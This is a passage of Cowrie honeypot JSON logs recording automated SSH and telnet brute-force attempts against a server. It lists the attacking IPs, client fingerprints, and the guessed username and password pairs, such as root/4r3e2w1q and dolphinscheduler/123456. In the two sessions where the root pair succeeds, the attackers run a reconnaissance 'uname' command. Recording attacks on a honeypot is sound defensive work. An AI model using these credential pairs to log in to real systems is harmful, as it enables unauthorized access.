-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:28:22.927518Z","src_ip":"212.227.235.229","session":"a008cc0c99cd"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:23.512226Z","src_ip":"212.227.235.229","session":"a008cc0c99cd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:24.660056Z","src_ip":"212.227.235.229","session":"a008cc0c99cd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49700,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b5f48ba2077","protocol":"ssh","message":"New connection: 217.72.205.35:49700 (1.2.3.4:22) [session: 4b5f48ba2077]","sensor":"my-vps","timestamp":"2025-08-28T05:28:32.343695Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:32.344724Z","src_ip":"217.72.205.35","session":"4b5f48ba2077"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":43038,"dst_ip":"1.2.3.4","dst_port":23,"session":"66faa4aae1e3","protocol":"telnet","message":"New connection: 8.222.212.69:43038 (1.2.3.4:23) [session: 66faa4aae1e3]","sensor":"my-vps","timestamp":"2025-08-28T05:28:42.338423Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59732,"dst_ip":"1.2.3.4","dst_port":22,"session":"be124879177b","protocol":"ssh","message":"New connection: 212.227.125.160:59732 (1.2.3.4:22) [session: be124879177b]","sensor":"my-vps","timestamp":"2025-08-28T05:28:44.721743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:28:44.727527Z","src_ip":"212.227.125.160","session":"be124879177b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:28:44.828789Z","src_ip":"212.227.125.160","session":"be124879177b"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:45.239994Z","src_ip":"212.227.125.160","session":"be124879177b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:46.349039Z","src_ip":"212.227.125.160","session":"be124879177b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35486,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb4a2795a0b4","protocol":"ssh","message":"New connection: 212.227.235.229:35486 (1.2.3.4:22) [session: bb4a2795a0b4]","sensor":"my-vps","timestamp":"2025-08-28T05:28:55.025597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:28:55.080043Z","src_ip":"212.227.235.229","session":"bb4a2795a0b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:28:55.224735Z","src_ip":"212.227.235.229","session":"bb4a2795a0b4"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:55.659392Z","src_ip":"212.227.235.229","session":"bb4a2795a0b4"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":10168,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c8251ccdee4","protocol":"ssh","message":"New connection: 80.94.95.15:10168 (1.2.3.4:22) [session: 0c8251ccdee4]","sensor":"my-vps","timestamp":"2025-08-28T05:28:56.179597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:28:56.180389Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:28:56.273551Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.login.failed","username":"user","password":"mandy","message":"login attempt [user/mandy] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:56.729827Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:56.804908Z","src_ip":"212.227.235.229","session":"bb4a2795a0b4"}
{"eventid":"cowrie.login.failed","username":"user","password":"labrador","message":"login attempt [user/labrador] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:57.827121Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.login.failed","username":"user","password":"kisses","message":"login attempt [user/kisses] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:58.922974Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.login.failed","username":"user","password":"katrin","message":"login attempt [user/katrin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:00.010344Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33276,"dst_ip":"1.2.3.4","dst_port":22,"session":"297aa7b2f340","protocol":"ssh","message":"New connection: 212.227.125.160:33276 (1.2.3.4:22) [session: 297aa7b2f340]","sensor":"my-vps","timestamp":"2025-08-28T05:29:00.462875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:00.467534Z","src_ip":"212.227.125.160","session":"297aa7b2f340"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:00.568167Z","src_ip":"212.227.125.160","session":"297aa7b2f340"}
{"eventid":"cowrie.login.failed","username":"user","password":"kasper","message":"login attempt [user/kasper] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:01.106628Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:29:01.174803Z","src_ip":"212.227.125.160","session":"297aa7b2f340"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:29:01.417832Z","src_ip":"212.227.125.160","session":"297aa7b2f340"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:29:01.418874Z","src_ip":"212.227.125.160","session":"297aa7b2f340"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:01.540950Z","src_ip":"212.227.125.160","session":"297aa7b2f340"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:01.542148Z","src_ip":"212.227.125.160","session":"297aa7b2f340"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:02.203337Z","src_ip":"80.94.95.15","session":"0c8251ccdee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45464,"dst_ip":"1.2.3.4","dst_port":22,"session":"997f0d6aa2bb","protocol":"ssh","message":"New connection: 212.227.235.229:45464 (1.2.3.4:22) [session: 997f0d6aa2bb]","sensor":"my-vps","timestamp":"2025-08-28T05:29:09.840169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:09.840991Z","src_ip":"212.227.235.229","session":"997f0d6aa2bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:09.986325Z","src_ip":"212.227.235.229","session":"997f0d6aa2bb"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:29:10.420650Z","src_ip":"212.227.235.229","session":"997f0d6aa2bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:29:10.784135Z","src_ip":"212.227.235.229","session":"997f0d6aa2bb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:29:10.784865Z","src_ip":"212.227.235.229","session":"997f0d6aa2bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:10.930345Z","src_ip":"212.227.235.229","session":"997f0d6aa2bb"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:10.931436Z","src_ip":"212.227.235.229","session":"997f0d6aa2bb"}
{"eventid":"cowrie.session.closed","duration":38.669392585754395,"message":"Connection lost after 38 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:21.006024Z","src_ip":"8.222.212.69","session":"66faa4aae1e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51850,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dd4df0e3d63","protocol":"ssh","message":"New connection: 212.227.125.160:51850 (1.2.3.4:22) [session: 7dd4df0e3d63]","sensor":"my-vps","timestamp":"2025-08-28T05:29:21.582477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:21.583871Z","src_ip":"212.227.125.160","session":"7dd4df0e3d63"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:21.688635Z","src_ip":"212.227.125.160","session":"7dd4df0e3d63"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:22.004943Z","src_ip":"212.227.125.160","session":"7dd4df0e3d63"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:23.117639Z","src_ip":"212.227.125.160","session":"7dd4df0e3d63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41632,"dst_ip":"1.2.3.4","dst_port":22,"session":"668b004295a4","protocol":"ssh","message":"New connection: 212.227.235.229:41632 (1.2.3.4:22) [session: 668b004295a4]","sensor":"my-vps","timestamp":"2025-08-28T05:29:28.814639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:28.816782Z","src_ip":"212.227.235.229","session":"668b004295a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:28.959213Z","src_ip":"212.227.235.229","session":"668b004295a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34524,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc6c91f8cde6","protocol":"ssh","message":"New connection: 212.227.125.160:34524 (1.2.3.4:22) [session: bc6c91f8cde6]","sensor":"my-vps","timestamp":"2025-08-28T05:29:29.167199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:29.182611Z","src_ip":"212.227.125.160","session":"bc6c91f8cde6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:29:29.282301Z","src_ip":"212.227.125.160","session":"bc6c91f8cde6"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:29.394181Z","src_ip":"212.227.235.229","session":"668b004295a4"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:29:29.692783Z","src_ip":"212.227.125.160","session":"bc6c91f8cde6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:30.538473Z","src_ip":"212.227.235.229","session":"668b004295a4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:29:30.799369Z","src_ip":"212.227.125.160","session":"bc6c91f8cde6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55552,"dst_ip":"1.2.3.4","dst_port":22,"session":"b18996eaeb30","protocol":"ssh","message":"New connection: 212.227.235.229:55552 (1.2.3.4:22) [session: b18996eaeb30]","sensor":"my-vps","timestamp":"2025-08-28T05:29:36.441392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:29:36.442317Z","src_ip":"212.227.235.229","session":"b18996eaeb30"}
